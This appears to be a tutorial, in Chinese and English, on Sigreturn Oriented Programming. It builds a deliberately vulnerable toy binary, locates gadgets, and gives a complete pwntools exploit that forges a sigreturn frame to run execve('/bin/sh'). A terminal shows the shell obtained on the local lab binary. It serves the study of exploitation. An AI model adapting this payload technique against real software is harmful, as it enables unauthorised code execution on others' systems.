SROP

Sigreturn Oriented Programming (SROP), a novel technique for exploits and backdoors in UNIX-like systems. 具体见[1]。

漏洞程序

  1. vuln程序
from pwn import *

context.arch = 'amd64'
context.os = 'linux'

elf = ELF.from_assembly(
    '''
        mov rdi, 0;
        mov rsi, rsp;
        sub rsi, 8;
        mov rdx, 500;
        syscall;
        ret;
        
        pop rax;
        ret;
    ''', vma=0x41000
)
elf.save('vuln')
└─$ cat /usr/include/asm/unistd_64.h | grep -i sigreturn -A2
#define __NR_rt_sigreturn 15
#define __NR_ioctl 16
#define __NR_pread64 17
  1. 嵌入shell地址
┌──(kali㉿kali)-[~/exploits/srop]
└─$ echo -en "/bin/sh\x00" >> vuln

┌──(kali㉿kali)-[~/exploits/srop]
└─$ strings -tx vuln |grep /bin/sh
   1238 /bin/sh

pwn

  1. 查看gadget
$ objdump -d -M intel vuln
vuln:     file format elf64-x86-64
Disassembly of section .shellcode:

0000000000041000 <__start>:
   41000:	48 c7 c7 00 00 00 00 	mov    rdi,0x0
   41007:	48 89 e6             	mov    rsi,rsp
   4100a:	48 83 ee 08          	sub    rsi,0x8
   4100e:	48 c7 c2 f4 01 00 00 	mov    rdx,0x1f4
   41015:	0f 05                	syscall
   41017:	c3                   	ret
   41018:	58                   	pop    rax
   41019:	c3                   	ret
  1. pwn
from pwn import *

elf = context.binary = ELF('./vuln', checksec=False)
p = process()

BINSH = elf.address + 0x1238
POP_RAX = 0x41018
SYSCALL_RET = 0x41015

frame = SigreturnFrame()
frame.rax = 0x3b            # syscall number for execve
frame.rdi = BINSH           # pointer to /bin/sh
frame.rsi = 0x0             # NULL
frame.rdx = 0x0             # NULL
frame.rip = SYSCALL_RET

payload = b'A' * 8
payload += p64(POP_RAX)
payload += p64(0xf)         # syscall number for sigreturn
payload += p64(SYSCALL_RET) # execute syscall instruction
payload += bytes(frame)

p.sendline(payload)
p.interactive()

pwn success

┌──(kali㉿kali)-[~/exploits/srop]
└─$ python exploit.py      
[+] Starting local process '/home/kali/exploits/srop/vuln': pid 1960175
[*] Switching to interactive mode
$ who
kali     pts/0        Feb 13 20:48 (192.168.44.1) 

参考

  1. [1] Sigreturn Oriented Programming Attack